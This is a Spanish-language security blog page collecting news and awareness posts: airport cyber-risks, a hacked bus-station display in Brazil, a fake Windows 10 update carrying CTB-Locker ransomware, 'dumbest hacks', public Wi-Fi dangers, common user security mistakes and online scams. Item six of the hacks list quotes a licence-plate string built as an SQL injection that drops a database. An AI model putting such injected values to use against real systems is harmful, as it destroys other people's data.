"Ahora que tenemos extremistas que están ganando estas capacidades, van a empezar a utilizar la información para otros tipos de ataques que no hemos visto antes. Van a ser años dificiles", dijo Miller.

La firma Cylance publicó recientemente un informe sobre un equipo de hacking iraní, que ejecuta una campaña de espionaje cibernético extrayendo información sensible de muchas organizaciones y entornos, incluidos los aeropuertos.

"Los estuvimos siguiendo durante 18 a 24 meses, pero no fue hasta que empezamos a verlos modificar cosas como los tiempos de respuesta de emergencia e información que podría poner la seguridad física de las personas en peligro que los tuvimos que parar", dice Miller .

"Cualquier persona que tenga una copia del plan de cómo un aeropuerto o cualquier instalación responde a una emergencia tiene ahora un modelo sobre cómo vencer a ese sistema", dijo Kenneth Honig, un ex comandante del departamento de policía de la Autoridad Portuaria de Nueva York y Nueva Jersey.

"Ahora que se ha traído a la luz pública, espero que se tomen medidas para solucionarlo, pero tomará tiempo." Añadió Honig, quien cuenta con 20 años de liderazgo en la fuerza.

Ríos insta a la Administración de Seguridad del Transporte de adoptar requisitos más estrictos en términos de seguridad cibernética de los equipos utilizados en cualquier aeropuerto.


"El nivel es muy bajo", dijo Ríos. "Siempre habrá problemas de seguridad, no podemos resolver todos los problemas de seguridad que existe, pero no debemos tener un nivel tan bajo que cualquiera puede hackear estos dispositivos. El nivel tiene que ser mucho más alto ".

Videos porno en las pantallas de una terminal de autobuses


(elperiodico) - Los pasajeros de autobuses de Curitiba (sur de Brasil) se sorprendieron este viernes por la tarde al aparecer en las pantallas durante un cuarto de hora, imágenes muy explícitas de un vídeo porno.

El evento, que ha causado consternación entre algunos hilaridad y en otros, se produjo en la hora pico, cuando la estación estaba llena, después de que el sistema de televisión interno fuera víctima un ataque de hackers.
En un segundo, estas imágenes fueron compartidas en las redes sociales por los pasajeros que esperaban y que fotografiaron las pantallas e imágenes de carteles con escritos obscenos o irónicos.

"Hemos enviado una denuncia ante la policía especializada en delitos informáticos para tratar de identificar la dirección IP del intruso", dijo en un comunicado la empresa de transporte urbano. Un portavoz del municipio de Curitiba dijo que la empresa responsable de la distribución de contenidos en la red interna de la estación se ha comprometido a reforzar su sistema de seguridad.

Curitiba, una ciudad de dos millones de habitantes, es la capital del Estado de Paraná y una de las ciudades más grandes del sur de Brasil.

Un peligroso ransomware de Windows 10 se está propagando rapidamente


(computerhoy) - Era inevitable, y ya están aquí. Muchos usuarios de Windows han comenzado a recibir falsos emails de Microsoft que supuestamente ofrecen la actualización gratuita de Windows 10. Si descargas el archivo e intentas instalarlo, se activa un ransomware que encripta los discos duros tu computadora y te pide un rescate por varios cientos de euros, para obtener la clave de desencriptación. Clave que nunca llegará, aunque pagues. La estafa se aprovecha de que Microsoft está llevando a cabo la actualización a Windows 10 por oleadas. Muchos usuarios aún siguen esperando para recibir la notificación de actualización de Windows 10. Aunque cerca de 500 millones de usuarios de Windows 7 y Windows 8 pueden actualizar a Windows 10, hasta ayer mismo sólo lo habían instalado 14 millones de computadoras.

Este es uno de los emails falsos:


Lo cierto es que los ciberdelincuentes han trabajado duro en el engaño, pues incluso consiguen que la dirección de email muestre un dominio de microsoft:


Para que la estafa sea más creible indican que el email ha sido revisado con MailScanner y no tiene virus, ofreciendo un enlace a la web del mencionado software, aunque por supuesto eso no significa que lo hayan usado.


El email contiene un archivo descargable. Si intentas instalarlo, se activa el peligroso ransomware CTB-Locker. Este tipo de malware encripta los archivos de tu disco duro, bloqueándolo por completo. Te dan 96 horas para que pagues un "rescate" en Bitcoins en un servidor oculto con Tor. Lo datos sólo se pueden desencriptar con una clave de desencriptación, pero aunque pagues, rara vez obtendrás la clave:


De momento estos emails falsos de Windows 10 que infectan con el ransomware CTB-Locker sólo se han visto en inglés, aunque lo más probable es que pronto aparezcan en español y otros idiomas. Si los ves, no te confies. Nunca descargues un archivo comercial o desconocido directamente desde un email.

Los 6 Hacks mas tontos de todos los tiempos

A lo largo de nuestras publicaciones te hemos traído historias sobre hacks muy inteligentes, malware muy avanzado y de como el mundo de la seguridad cada vez se vuelve mas estrecho, pero esta vez toca enumerar 6 de los hacks no tan brillantes que nos ha tocado ver.

1. En el 2010, la cuenta de correo electronico de Kelly Osborne (de Dancing with the Stars) fue hackeada. El hacker, con ganas de ver todos sus correos electronicos, reenvio los mensajes de correo electrónico de Kelly a su cuenta, su cuenta de correo electrónico personal. Esto no parece una idea tan inteligente y probo no serla.


2. El auto proclamado hacktivista Shahee Mirza y varios asociados desfasaron un sitio web del gobierno militar de Bangladesh, Batallón de Acción Rápida, con el siguiente mensaje:

"EL GOBIERNO NO TOMA NINGUNA INICIATIVA PARA EL DESARROLLO TIC (Tecnologías de Información y Comunicación). PERO APROBO UNA LEY ANTI CYBER CRIMEN. USTEDES NO SABEN LO QUE ES LA CYBER SEGURIDAD O CÓMO PROTEGERSE. ESCUCHEN. LOS HACKERS NO SON CRIMINALES. ELLOS SON 10 VECES MEJOR QUE TUS EXPERTOS. SOMOS MAS GENIOS (escrito GINIOUS) DE LO QUE PUEDEN PENSAR. DESFASADO DESDE BANGLADESH. ".


Desafortunadamente Mirza de 21 años de edad también dejó un anuncio que indica claramente: "Hacked by SHAHEE_MIRZA." Obviamente no es el "GINIOUS" descrito en su hack, Mirza pudo haber acabado con 10 años en una prisión federal de Bangladesh. Sólo puedes imaginar como serán las prisiones en uno de los países más pobres del mundo.
3. Famoso por su gusano Samy, Samy Kamkar fue responsable de un ataque similar a un virus que infectó a más de 1 millón de cuentas de MySpace en 2006. Entre otros efectos maliciosos fue el 'Samy es mi héroe "Además de la página de MySpace de cada uno de los millones víctimas. Como parte de su evidente ego, Samy llegó a jactarse de su hazaña de hacking en un blog.


Desafortunadamente para Samy, el blog contenía una foto de él con una matrícula de auto en el fondo, que luego fue usada para encontrarlo.

4. A Sayaka Fukuda de 20 años de edad,  le robaron su iPhone en las calles de la ciudad de Nueva York. El ladrón, Daquan Mathis, mientras disfrutaba de su nuevo iPhone tomó una foto de sí mismo (vestido con la misma ropa que llevaba durante el atraco), que luego envió a su propia dirección de correo electrónico. Desafortunadamente para Mathis, la cuenta de correo electrónico iPhone de Fukuda se podía acceder a través de Internet (como casi todas). Dada su dirección de correo electrónico, simplemente era cuestión de buscar a Mathis, lo cual se facilito aún más por el hecho de que la policía tenía su imagen.

La foto que Mathis se tomo con en iPhone

5. Eduard Lucian Mandru es un hacker muy inteligente. Su hack en el 2006 al sistema informático del Departamento de Defensa (DOD) estadounidense no fue detectado durante años, con las autoridades teniendo la dirección electrónica de Mandru (wolfenstein_ingrid@yahoo.com) como su única pista. Sin embargo, la caída y arresto de Mandru en 2009, se produjo cuando se utilizo la misma dirección de correo electrónico wolfenstein_ingrid@yahoo.com en su curriculum que luego envió a numerosos foros de trabajo. A veces vale la pena utilizar diferentes direcciones de correo electrónico para diferentes tareas, ¿no crees?

Mandru al momento de ser arrestado en 2009
6. Tal vez no tonto si no bastante creativo. Un hacker no nombrado se dio cuenta de que las trampas de velocidad recientes utilizan cámaras que registran automáticamente tu velocidad, toman una foto de tu placa, y luego usan el reconocimiento de caracteres para traducir que el número de placa en algo que pueden utilizar como una búsqueda en la base de datos del DMV. Con esto en mente, él cambió su número de matrícula a ('ZU 0666', 0, 0); Drop Database Table.

Si el DMV hubiera utilizado esta cadena de caracteres en su búsqueda de la base de datos existía una buena oportunidad de borrar todos los registros de bases de datos que contienen su número de matrícula real, ZU 0666. Esto tiene que ser 10 de 10 en la escala de la creatividad, y ademas demostrando una vez más la importancia de saber lo que es la inyección de SQL.

¿Es seguro el Wi-Fi del Hotel?

El Wi-Fi público puede ser muy conveniente, pero no siempre es seguro. Te explicamos por qué es importante asegurarte que tus datos vayan cifrados al utilizar servicios web.


Imágen: Forbes
Recientemente, se identificó una nueva vulnerabilidad de autenticación en el firmware de los routers que se utilizan en hoteles en todo el mundo.

Esto significa que se pueden escribir nuevos archivos en los routers y luego potencialmente en los equipos (es decir los huéspedes del hotel) que estan conectados, infectadolos.

El Wi-Fi público no es un riesgo nuevo, debido a que estas redes van sin encriptar y envían todos sus datos en texto plano, a menos que, por supuesto, el sitio web que está visitando ofrezca cifrado.
¿Por qué es importante si tu información va sin cifrar? Imagina que todo tu correo ordinario llegara a casa por escrito en las postales para que cualquier persona en la cadena de suministro pudiera leerlos. Sería una gran e inaceptable invasión de tu privacidad.

El riesgo es similar pero tu no puedes ver que todo fue enviado para que otros lo lean, en caso de que así lo deseen.

Manténte a salvo durante el uso de Wi-Fi público


  • Al usar pública Wi-Fi en cafés, aeropuertos, hoteles o incluso cuando se visita un lugar de trabajo que tiene red Wi-Fi de invitados siempre se debe tener cuidado en qué servicios utiliza mientras está conectado.
  • Siempre que sea posible, utiliza una red privada virtual (VPN). Esto cifra los datos que se envían a través de la red Wi-Fi pública con la que estas conectado, o dicho de otra forma, esto pondra tu correo de vuelta en los sobres.
  • Muchos estafadores crean redes Wi-Fi falsas para llevar a cabo lo que se conoce como un ataque del hombre en medio. Si usted está en un hotel o aeropuerto, asegúrese de que está utilizando el servicio legítimo Wi-Fi.

11 errores de seguridad que pudieras estar cometiendo


(welivesecurity) - Cuando se trata de la seguridad de los datos, los atacantes siguen aprovechándose del punto más débil de todos: las personas. En este artículo analizamos 11 errores de seguridad que muchos usuarios -los más irresponsables- siguen cometiendo a diario. 1. No instalar parches

La triste realidad es que la mayoría de las filtraciones de datos no solo se debe a errores humanos, como hacer clic en un vínculo malicioso, sino también a sistemas informáticos cuyo software está desactualizado.

Por ejemplo, los atacantes suelen aprovechar las fallas de Microsoft Office y Adobe Player que los usuarios aún no corrigieron, para lograr entrar a los equipos. Otros atacantes más avanzados aprovechan las vulnerabilidades que llamamos “0-day” para las cuales todavía no se publicó el parche o la revisión correspondiente.

Para muchos usuarios, e incluso para algunos administradores de sistemas corporativos, la administración de los parches sigue siendo una tarea banal. No obstante, la buena noticia es que cada vez es más fácil hacerlo. Microsoft está implementando modificaciones en Windows que dejarán la Revisión de los Martes como cosa del pasado, mientras que la mayoría de sistemas operativos (incluyendo Android e iOS) ahora cuentan con una funcionalidad de actualización automática para aplicaciones móviles, de modo que los usuarios no tienen que hacer nada.

2. Ser demasiado confiados

Las personas siguen siendo demasiado confiadas en el mundo digital. Quizá ya la mayoría comenzó a ignorar las llamadas y los mensajes de texto no solicitados al igual que a los vendedores ambulantes que se presentan en el hogar, pero aún siguen abriendo correos electrónicos y vínculos de personas que no conocen.

Demasiado a menudo, los usuarios abren esos correos electrónicos y descargan archivos adjuntos (algunos de los cuales pueden incluir malware), y en ciertos casos hacen clic en vínculos acortados que aparecen en Twitter, LinkedIn o Facebook. Algunos de ellos los redirigen a sitios web infectados y son señuelos para que caigan en engaños.

3. Reutilizar contraseñas

El mayor paso en falso que los usuarios informáticos siguen dando es el uso de contraseñas débiles o reutilizadas, que los atacantes pueden adivinar mediante ataques por fuerza bruta.

La administración de contraseñas puede ser un problema: un estudio reveló que, en el Reino Unido solamente, la persona promedio usa contraseñas para 19 cuentas diferentes.

El surgimiento de programas para administrar contraseñas y de la tecnología biométrica mejoró algunas de estas dificultades, pero de todas maneras es probable que la seguridad de las contraseñas siga siendo un problema para algunos usuarios.

Por más sorprendente que parezca, esta contraseña seguía siendo la más popular en 2014.

4. Dar datos de más en las redes sociales

Las generaciones Y y Z usan cotidianamente Twitter, Facebook, Instagram y otras plataformas sociales, así como WhatsApp, Viber y otros servicios similares de mensajería instantánea.
Estas generaciones más jóvenes comparten prácticamente cada detalle intrincado de sus vidas, lo que lleva a la posibilidad de que dicha información online se intercepte, se robe o simplemente se venda a criminales.

Esta información también se puede vender a terceros comerciantes para que hagan publicidad dirigida, y es probable que los cibercriminales usen la misma información públicamente disponible para realizar ataques de Ingeniería Social, como enviar correos electrónicos o vínculos para ataques de phishing.

5. No tener soluciones de seguridad

Los programas antivirus cambiaron y evolucionaron en los últimos años. Su objetivo es detectar y eliminar en forma proactiva virus, troyanos, gusanos y otras clases de malware para mantenerte protegido. Sin embargo, algunas personas aún no tienen una solución de seguridad, aunque es una de las primeras líneas de defensa – junto con tener buenos hábitos y mantener los sistemas actualizados.

6. Creer que “eso no va a pasar”

Uno de los mayores problemas que tienen las personas con la seguridad de la información no es algo que ignoran, como instalar parches o descargar una solución de seguridad, sino la sensación de que ellos no son un objetivo deseado para los cibercriminales.
Los individuos y las empresas siguen adoptando el mismo enfoque de que “esto no va a pasarme a mí”. Ignoran las prácticas de seguridad esenciales y luego expresan su sorpresa cuando pierden datos, dinero o información como resultado de un ataque informático.

7. Dejar los dispositivos sin supervisión

Un error simple que muchos siguen cometiendo es dejar los equipos de escritorio o portátiles sin supervisión y desbloqueados. Lo mismo aplica a dispositivos móviles, como smartphones y tabletas.
No cabe duda de que el mayor riesgo es el robo del dispositivo, pero si se dejan desbloqueados también pueden exponer a los usuarios al robo de datos o a que te espíen mientras navegas online (lo que conocemos como “shoulder surfing”).

8. Navegar con conexiones desprotegidas

Todos exigimos tener Wi-Fi gratuito en todas partes adonde vayamos, ya sea para poder navegar en Internet, verificar la cuenta de Twitter o Facebook, comprar productos online, vigilar las transacciones bancarias o realizar una llamada VoIP.

Pero a veces nos conectamos a redes Wi-Fi públicas de mucho tráfico que no son seguras y son abiertas, como en un café. En estas conexiones de Wi-Fi abiertas que no están protegidas por contraseña, las visitas a sitios web HTTP sin cifrar (no HTTPS) pueden permitirle a un atacante llevar a cabo un ataque Man-in-the-Middle (MITM) para interceptar el tráfico y monitorearlo para robar información, como contraseñas para transacciones bancarias online.

9. Ignorar las advertencias de los certificados SSL

¿Alguna vez visitaste un sitio web y recibiste una advertencia de seguridad de que la conexión no era segura? Probablemente alguna vez te pasó y quizá seguiste adelante y entraste a ese sitio no seguro.
La advertencia indica que el certificado SSL no es válido o venció, lo que hace que la conexión no sea segura y es más probable que un tercero logre comprometerla.

De hecho, investigadores de la universidad Carnegie Mellon University dijeron ya en el año 2009 que las advertencias sobre certificados digitales en los navegadores web no son una medida de seguridad efectiva, ya que muchos las ignoran. Hace poco, Google rediseñó sus advertencias de seguridad tras enterarse de que los usuarios de Chrome ignoraban 70% de las advertencias.

10. Descargar apps desde fuentes desconocidas

Ahora ya no es tan común, pero algunos dueños de smartphones y tabletas siguen descargando aplicaciones desde sitios web y tiendas de terceros no oficiales, lo que representa un riesgo masivo.
Algunas de estas tiendas contienen aplicaciones que son maliciosas o que parecen legítimas, pero que en realidad se volvieron a compilar incluyendo códigos maliciosos.

11. Liberar dispositivos móviles

Aunque algunos dueños de dispositivos iOS y Android prefieren liberar sus dispositivos para dejar de estar sujetos a las limitaciones impuestas por Google y Apple respectivamente, el proceso de jailbreak también representa un riesgo de seguridad.

“Lo que persigue un usuario con este proceso es acceder por completo al control del sistema operativo, pudiendo, entre otras cosas, descargar aplicaciones, extensiones y temas que no están en el repositorio oficial. Pero sucede que a la vez, este proceso deja un hueco de seguridad que podría ser aprovechado de forma maliciosa”, explicó Camilo Gutierrez, Security Researcher de ESET, al analizar la funcionalidad Rootless de iOS 9 que para muchos es un impedimento para realizar jailbreak.

La liberación de dispositivos puede provocar que ciertas aplicaciones dejen de funcionar y se comporten de modo inusual, mientras que también los hace más propensos a ataques externos. Además, si cambias la configuración de un iPhone o iPad, anularás la garantía de Apple.

Y tú, ¿cometiste alguno de estos errores?

Infografía - Tu Arsenal de Herramientas para Pentesting

El Blog CFT365 hizo una encuesta sobre las herramientas utilizadas cuando se están haciendo pruebas de penetración (Hacking Etico).

Aquí te dejamos la infografía:

5 estafas de Internet en las que es muy probable que caigan tu mamá o hijo

La seguridad en línea es, en muchos aspectos, mejor que nunca, al igual que los sitios diseñados para atraer nuestra atención. Pero aún existen vulnerabilidades y los ladrones que quieren explotarnos, disfrutando de modelos avanzados malware como servicio para robar nuestros datos, tiempo y dinero. Y con el número increíble de personas en línea, las estafas sólo tienen que trabajar un pequeño porcentaje de la hora de hacer ricos a los chicos malos.


Estamos seguros de que eres lo suficientemente inteligente para evitar esos problemas. Pero para todos los demás, ya sabes, aquí están 5 estafas comunes a tener en cuenta.

1. Ransomware.Esta estafa, que F-Secure Labs ha estado siguiendo desde hace más de 5 años, prospera porque ofrece increíbles retornos - al estafador. "Se estima que costaría $ 5.900 (£ 3,860) para comprar un kit de ransomware que podrían volver hasta $ 90.000 en un mes desde la operación", informa la BBC.Funciona así. De repente aparece un mensaje diciendo que sus archivos están detenidos y hay que pagar un rescate para liberarlos.

A veces la estafa pretende ser de una organización policial para hacerlos extraordinariamente temibles:Las ciber-monedas anonimas como el bitcoin han hecho que la estafa sea aún más atractiva.

"Eso es lo que realmente activa la efectividad del ransomware", dijo Mikko Hypponen nuestra. "Una vez que los delincuentes pudieron recoger su rescate sin ser descubierto, nada los detuvo."Ellos realmente tienen tus archivos y por lo general te los devolveran. Irónicamente, su reputación importa ya que la gente va a dejar de pagar si oyen que no funciona.Mikko recomienda cuatro maneras de defenderse a sí mismo de esta - y casi todas las estafas:

Siempre manten una copia de seguridad de tus archivos importantes.
Asegúrate de que el software está actualizado.
Sospecha de los archivos adjuntos de mensajes y enlaces en el correo electrónico.
Siempre ejecuta software de seguridad integral actualizada.

Y añade: "No pagues dinero a estos delincuentes a menos que sea absolutamente necesario."

2. Estafas de soporte técnico.

"En un giro reciente, los estafadores están utilizando el teléfono para tratar de entrar en el equipo", informa la Comisión Federal de Comercio de Estados Unidos. "Lo llaman, diciendo ser técnicos informáticos asociados con empresas de renombre como Microsoft. Ellos dicen que han detectado virus u otro tipo de malware en el ordenador engañando al usuario para que les de acceso remoto o pagar por el software que no es necesario ".

Nunca des a cualquier persona que te llama de forma no solicitada tu información privada o acceso a su computadora. De hecho, no lo hagas incluso si se has solicitado la llamada. Si sientes que la llamada en realidad puede ser importante, pregunta quién está llamando desde donde y ponte en contacto con la organización directamente.

3. Los regalos de Facebook.

iPad Gratis! Vacaciones gratis! Tarjeta de regalo gratis!

Si es gratis, está en Facebook y se trata de alguien que no conoces o confías directamente, asume que es una estafa. En el mejor de los casos es una pérdida de tiempo, en el peor, podría terminar costándote dinero.Por desgracia, sólo hay dos cosas que puedes hacer para evitar estas estafas.

No seguir a personas que comparten cosas como esta en Facebook y no hagan clic en cosas que parecen demasiado buenas para ser verdad."No hay manera de que una empresa puede permitirse el lujo de dar a cada usuario de Facebook una tarjeta de $25.00, $50.00 o $ 100.00 regalo" Facecrooks, un sitio que monitorea estas estafas, le recuerda. "Un poco de sentido común aquí te dice que algo está fuera de lugar."

Así que sospechar de todo en Facebook. Incluso los amigos pidiendo dinero.4. Estafas de préstamos.Los estafadores son inteligentes. Ellos saben que cuanto más una persona está en necesidad económica, más desesperado se vuelve. Por esta razón, los préstamos de varios tipos - especialmente las hipotecas que están en ejecución hipotecaria - son a menudo atrayentes para estafas.
Una vez que tienen tu atención, pueden utilizar una variedad de tácticas para engañarte. Pueden exigir una cuota para renegociar tus préstamos para la reducción de los pagos o para hacer una "auditoría" de lo que estás pagando. Incluso pueden ir lo suficientemente lejos como pedir directamente o engañarte a firmar papeles de tu casa para aliviar la presión de tus acreedores.

Hay muchas señales de advertencia a tener en cuenta. Ten en cuenta que si alguna vez tienes dudas, el mejor paso es retroceder y buscar consejo. También puede decirle a la persona que vas a obtener una segunda opinión sobre esto de un abogado. Si la persona con la que estás tratando se asusta o insiste que no lo hagas de alguna manera, es una buena señal que te quiere estafar.

5. Estafas de mulas de dinero.

Estas estafas son una variante de la estafa 419, donde un príncipe extranjero te pide que cuides de su  dinero por él. Todo lo que tienes que hacer es transferirle una cantidad tu primero. Pero en este caso,  puedes realmente conseguir el dinero y ser utilizado como una herramienta de la delincuencia organizada.

Una mula de dinero transfiere ilegalmente dinero para alguien y a cambio se queda con una tajada. Muchas personas que respetan la ley se ven inmersos en este delito durante la búsqueda de empleo o romance, por lo que su debe atenerse a sitios legítimos si estas buscando alguna de ambas. La codicia y las ganancias y las herencias de lotería también se utilizan como carnada para atraer víctimas potenciales.

La confianza es lo más importante en Internet. Cualquier persona que confía en ti demasiado rápido con ofertas de dinero o en el amor, probablemente te esta estafando.
Siguenos:
¿Usas Feedly? Suscribete:
follow us in feedly
Anuncios
Lo Más Popular